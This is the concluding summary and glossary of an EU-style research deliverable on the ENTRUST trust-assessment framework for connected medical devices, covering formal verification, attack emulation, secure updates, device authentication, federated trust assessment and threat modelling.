Throughout this deliverable, we provided detailed descriptions of all the components participating in the Trust Assessment process of ENTRUST, throughout all three operational phases of the ENTRUST framework, i.e., the **Manufacturing Phase**, **Pre-deployment (Domain-specific) Phase**, and **Runtime Phase**. Specifically, we built upon the initial definitions of all these components documented in D3.1 [24] and D3.2 [?] and provided various enhancements and additional functionalities in order to better support the core target of ENTRUST, i.e., to *enhance the capability of medical organisations to provide reliable healthcare services by ensuring that the trustworthiness level of Connected Medical Devices (CMDs), as well as the system as a whole, remains at an acceptable level*. All components have been evaluated through benchmarking results, and they are ready to be integrated into the infrastructure of all use case demonstrators, in order to guide the final evaluation of these components in the context of all use cases, to be documented in D6.2 [29].

Chapter 2 was focused on the description of the final version of the **Formal Verification** component. Specifically, we described the implementation of the **Domain-Specific Language (DSL)** using Langium, which provides predefined functions for symmetric and asymmetric encryption, message signature and verification, exponential function, and private/public keys. It also supports various built-in types, as well as different queries, which aim to abstract the complexity to define ProVerif models. Next, we focused on the formal verification of the ZTO process of ENTRUST. To this end, we first described the threat model based on the Dolev-Yao construction and we presented the ProVerif and Tamarin models for all sub-phases of the protocol. Finally, we demonstrated the actual formal verification process, through a detailed listing of the ProVerif queries performed in order to check the correctness of all concerned security properties.

In Chapter 3, we provided a detailed description of the final version of the **Attack Simulation and AI-Based Misbehaviour Detection** component. First, we detailed the motivation and technical details behind the use of the QEMU environment for emulating the ARM-based architecture of the Raspberry Pi, specifically targeting a configuration compatible with Raspbian OS. Next, we provided an implementation path report, listing the approaches followed in order to select the most suitable for our application, namely **VirtualBox-based Raspberry Pi OS virtualisation**, **containerised Raspberry Pi on Kubernetes**, and **QEMU-based emulated Raspberry Pi environment**, and we detailed the reasoning behind the selection of the latter. Next, we provided technical and architectural details on the experimental environment, and we demonstrated the emulation of various types of attacks, considering the most prominent threats identified in the threat landscape documented in D2.2 [30]. We also detailed our novel approach for automating the configuration of clustering-based unsupervised learning for anomaly detection leveraging metamorphic testing, we detailed our configuration approach, and we provided benchmarking results.

Chapter 4 is dedicated to the description of the **Secure Software Update (SSU)** component of ENTRUST. Specifically, we provided an updated architecture of the SSU component, including a detailed description of the key stakeholders and roles participating in the process and the key functional elements of the architecture. Next, we provided the rationale behind our implementation, and comparison with other state-of-the-art practices. We then focused on the batching approach for scalability in the update process, including the various types of device grouping examined, specifically by **device model**, **physical or network location**, and **communication interface**. Next, regarding the hierarchical software update modality for application in scenarios involving Low-end and High-end devices, we provided details on the implementation, consisting of two core steps: **twin-level routing via recursive proxy traversal** and **update handoff via adapter chain forwarding**. We finally provided detailed benchmarking results, highlighting the performance benefits from the batching approach.

In Chapter 5, we detailed the updated **device authentication flow** based on the **EAP-PSK (Pre-Shared Key Extensible Authentication Protocol)** in order to ensure that only legitimate devices can join the ENTRUST network and utilise the security enablers provided by ENTRUST. To this end, we first provided an update sequence diagram on the onboarding phase and the implementation path report, as well as the detailed description of the technical details of the experimental testbed.

This guided the experimental activities documented in this deliverable, where we provided detailed timing results for each step of the process, and we set the scene for the final experimentation activities to be performed as part of the use case environments.

In Chapter 6, we focused on the new modality introduced for the **Trust Assessment Framework (TAF)**, namely the **Federated TAF**. To this end, we first provided a detailed listing of functional specifications and non-functional requirements characterising the Federated TAF, as well as the underlying constraints and assumptions. Next, we provided details on the interplay between the TAF and the **Risk Assessment (RA)** component, and the process for expressing the trust requirements in a manner that allows the comparison of a computed ATL opinion with defined RTL constraints. Throughout the remainder of the Chapter, we provided technical details of the Federated TAF, including internal and external interfaces, realisation of Trust Sources, and information on the technology stack. Finally, we provided a detailed description of the evaluation setup, as well as the results of the experimental activities and discussion on the results.

Chapter 7 was dedicated to the description of the **Threat Modelling** component. We first provided our motivation behind the use of the **GROQ Model Provider**, particularly its capabilities to increase efficiency through leveraging high-performance inference capabilities and leveraging specialised hardware and optimised architectures. Then, we provided details on the integration with Apache Kafka for enabling reliable, scalable, and high-performance communications, and we outlined the technical process for the integration with the Risk Assessment component in order to enable the consideration of attack path calculation. Regarding the **Software Verification** component, we detailed our approach for fuzzing with the application of LLMs, and we provided experimental results by testing ZephyrOS binaries with Antmicro's AFL++ fork.

Overall, in this deliverable, we provided detailed descriptions of all components participating in the trust assessment process of ENTRUST, as well as evaluation and benchmarking results on these as standalone components. Thus, we are now fully prepared for the final integration of these components with the use case architectures, as we have verified the correct and efficient operation of these components and ensured that there are no issues that impede their operation. The final evaluation in the context of the use cases of ENTRUST is going to be performed and documented as part of D6.2 [29].

Appendix A

Glossary

(Medical) Domain Refers to the entirety of the infrastructure of the medical organization where a CMD is deployed, including the backend infrastructure (servers), medical devices operating within the organization, and interconnectivity between all aforementioned entities.

AI-based Intrusion/Misbehavior Detection This component applies AI-based methods on the emulation performed on the DT, as well as information collected during the runtime of the operation of the device using probes, in order to determine whether the behavior of the device deviates from the normal behavior of the device.

ATL The Actual Trust Level (ATL) reflects the result of an evaluation of a trust proposition, for a specific CMD, as defined in a trust model managed by the ENTRUST TAF. It quantifies the extent to which a certain node or data can be considered trustworthy based on the available evidence.

Attestation Agent The component of the CMD which is responsible for the execution of the attestation logic of an attestation enabler, as well as communicating with external entities in order to share attestation-related information.

Authentication The process which aims to verify the authenticity of a device, prior to its Onboarding and Enrolment into the (Medical) Domain. This process is performed by the Authentication Server of the Manufacturing domain through the Domain Manager, using the Root ID Key of the device.

Authentication Server The Authentication Server is responsible for authenticating the device using its Root ID Key, in order to enable its enrolment and onboarding into the (Medical) Domain.

CMD A medical device that has been deployed, enroled, and onboarded into a (Medical) Domain. Note that this term cannot be used during the Manufacturing (Design) Phase of the ENTRUST action workflow, since this phase considers the device in isolation, and can only be applied during the Pre-deployment (Domain-specific) Phase and the Runtime Phase of the ENTRUST action workflow.

Conformity Certificate A certificate which is created after a successful attestation process on a device and is stored on the ledger, so that an external entity is able to audit the correctness of the attested set of attributes of the device. The Conformity Certificate utilizes Privacy Attribute-Based Credentials (PABCs) in order to share those attributes in a privacy-preserving manner.

Device Tracer The capabilities of the device (e.g., eBPFs) to collect types of trust evidence or attestation evidence specified by the Trust Policy of the device in order to prove the correctness of the required trust attributes of the device.

Device-level MUD Defines the foundational security requirements of a device, outlining the necessary operational characteristics to mitigate threats and vulnerabilities, considering the device in isolation (i.e., before it is deployed to the actual medical domain).

Domain Manager The Domain Manager is a centralized server deployed at the infrastructure level of a (Medical) Domain, responsible for the Authentication, Enrolment, and Onboarding of medical devices into the domain. It also acts as an orchestrator for the operation of all ENTRUST components between the medical domain, as well as the mediator between the device, the Blockchain infrastructure, and the MUD Server.

Domain-level eMUD Extends the Device-level Manufacturer Usage Description (eMUD) in order to include device characteristics, threats, and vulnerabilities that considering its positioning within the medical domain, and specifies security enablers for mitigating domain-level threats and vulnerabilities.

DT Digital Twin refers to a digital representation of a device, which is used in order to perform an emulation of the identified types of attacks and can provide the basis for the detection of deviations from the known and expected behavior of the device. It may also be used in the context of SSUs, where an up-to-date contextual information of a device is required to perform the targeted assignment of software updates.

Enrolment Entails the issuance of the set of Verifiable Credentials (VCs) of a device through the Privacy Certification Authority (CA), after it has been successfully authenticated.

Formal Verification The Formal Verification component is the component of the ENTRUST framework which is responsible for checking whether the design of the device satisfies the security requirements identified for the particular device, by specifying and using models of the critical security protocols and schemes of ENTRUST and checking whether the security properties hold for the specific model.

Key Restriction Usage Policy A local attestation policy dictating that a specific cryptographic key cannot be used by a device, unless it is known to be in a correct and trustworthy state, based on the characteristics contained in the Policy Hash of the device.

LLM In the context of ENTRUST, this refers to a model used by the Threat Modeling (TM) component in order to create attack scenarios in natural language to set forth expectations regarding what types of attacks could occur in a specific infrastructure.

Manufacturing (Design) Phase The Manufacturing phase of the ENTRUST framework includes all actions taken from the construction of the actual device until it leaves the manufacturing domain and is deployed to the medical domain where it will be enrolled and onboarded. This phase includes the identification of threats and vulnerabilities by the Manufacturer and the Threat Modeling component, the Formal Verification of the source code and binaries on the device, the emulation of identified threats using the DT of the device, and an initial Risk Assessment (RA) of the device in isolation (i.e., before it is actually deployed to the medical domain).

MUD Server The MUD Server is responsible for the storage of the Device-level MUD and the Domain-level extended Manufacturer Usage Description (eMUD) of the CMDs. They can be retrieved based on the MUD URL provided by the Manufacturer and contained within the device, so that the specified security controls can be applied by the device.

Onboarding Entails the integration of a medical device into the (Medical) Domain, after its successful Authentication and Enrolment. In this context, the device needs to provide a Verifiable Presentation (VP) to the Domain Manager containing the set of attributes that the device needs to verifiably prove ownership of in order to be enrolled into the domain.

Policy Hash Values that can be used in order to verify the operational correctness of the device based on specific characteristics of the device (e.g., secure boot output, type of Secure Element, Trusted Computing Base (TCB) specification).

Pre-deployment (Domain-specific) Phase The Pre-deployment (Domain-specific) phase of the ENTRUST framework includes the actions taken from the moment the device is deployed from the Manufacturer to the medical domain, until it begins its actual operation in the context of the domain. It includes two core phases: (i) The device authentication, enrolment, and onboarding, and (ii) the re-evaluation of the recalculation of the RTL of the device based on domain-specific threats and vulnerabilities identified by the System Administrator, the Threat Modeling, the DT, and the Formal Verification component.

Privacy CA The entity responsible for the issuance of the Verifiable Credentials (VCs) of the CMD containing the device attributes or characteristics based on which Trust Assessment is performed, after it has been successfully authenticated through the Authentication Server.

Protection Profile The Protection Profile of the device is the part of the Device-level MUD or Domain-level eMUD which contains the identified threats and vulnerabilities for the device, as well as the mitigation measures which can be employed for their mitigation during runtime.

Remote Attestation A secure mechanism where a Verifier entity aims to verify the correctness of one or more attributes of a Prover device (e.g., configuration integrity or control flow). This is typically performed by the Verifier issuing an attestation challenge to the Prover, who needs to collect the appropriate data as attestation evidence (using its Device Tracer) and construct the appropriate response in order to prove the correctness of the specified attributes.

Risk Assessment The Risk Assessment component of ENTRUST is responsible for performing risk quantification on the device based on all the identified threats and vulnerabilities, both at the manufacturing domain considering the device in isolation, and at the medical domain considering the interdependencies of the device with other entities of the service graph chain. It is also responsible for the calculation of the RTL of the device based on the identified threats and vulnerabilities, as well as its recalculation in case new threats or zero-day exploits are detected during runtime.

RoT The (Hardware) Root of Trust (RoT) is the minimal set of security guarantees usually provided by the hardware that is sufficient to guarantee the security of a larger TCB.

RQL Resource Query Language (RQL) is a query language designed for use in URIs with object style data structures. RQL can be thought as basically a set of nestable named operators which each have a set of arguments. RQL is designed to have an extremely simple, but extensible grammar that can be written in a URL friendly query string. Eclipse Ditto utilises a subset of RQL as language for specifying queries.

RTL The RTL reflects the amount of trustworthiness a device considers required in order to characterize it as trusted, based on the identified threats and vulnerabilities for the particular type of device.

Runtime Phase The Runtime phase includes all actions in order to ensure the trustworthiness of the CMD during runtime. This entails the execution of security controls, such as Remote Attestation (RA) schemes and the runtime calculation of the ATL of the CMD. In case $ATL < RTL$, the device is determined to be in an untrustworthy state and additional mitigation measures may need to be applied, such as the deployment of a SSU.

Software Verification The Software Verification component is responsible for checking the safety of software applications running on the medical device, as well as libraries running on the device, using Indices of Compromise from multiple intelligence sources based on the identified threat landscape.

SSU Secure Software Update refers to the secure deployment of a software or firmware patch through the DT of the device, in case a vulnerability has been detected and needs to be addressed.

System Administrator The person or entity who has in-depth knowledge of the (Medical) Domain and its specific requirements, is responsible for providing information on domain-specific threats and vulnerabilities to the Risk Assessment component, and is able to re-assess the risks identified by the ENTRUST component and the mitigation measures required in order to address them.

TAF A software framework which, given a trust model for a specific function running inside a CMD, is able to evaluate trust sources for trustworthiness evidence, as well as evaluate propositions within the trust model to obtain their ATLs. An RTL can also be evaluated and trust decisions can be taken and communicated to the application.

TCB The Trusted Computing Base (TCB) of a computer system is the set of all hardware, firmware, and/or software components that are critical to its security, in the sense that bugs or vulnerabilities occurring inside the TCB might jeopardize the security properties of the entire system. By contrast, parts of a computer system that lie outside the TCB must not be able to misbehave in a way that would leak any more privileges than are granted to them in accordance to the system's security policy.

Threat Intelligence Database A common database which contains the threats and vulnerabilities identified for a medical device by the ENTRUST framework, and can be accessed by other device manufacturers as threat intelligence knowledge towards increasing the security posture of devices operating within the medical domain.

Threat Modeling The Threat Modeling component is responsible for identifying known threats and vulnerabilities for a specific type of device based on existing threat intelligence databases, and aggregating them into an attack vector using an Large Language Model (LLM).

Trusted Computing Group The Trusted Computing Group (TCG) is a not-for-profit organization formed to develop, define and promote open, vendor-neutral, global industry specifications and standards, supportive of a hardware-based root of trust, for interoperable trusted computing platforms. TCG's core technologies include specifications and standards for the Trusted Platform Module (TPM), Trusted Network Communications (TNC) and network security and self-encrypting drives. TCG also has work groups to extend core concepts of trust into cloud security, virtualization and other platforms and computing services from the enterprise to the Internet of Things..

Trust Policy A smart contract deployed to the private ledger, which specifies the RTL of the device, as well as the types of trust evidence that needs to be collected in order to verify the correctness of the trust attributes of the device.

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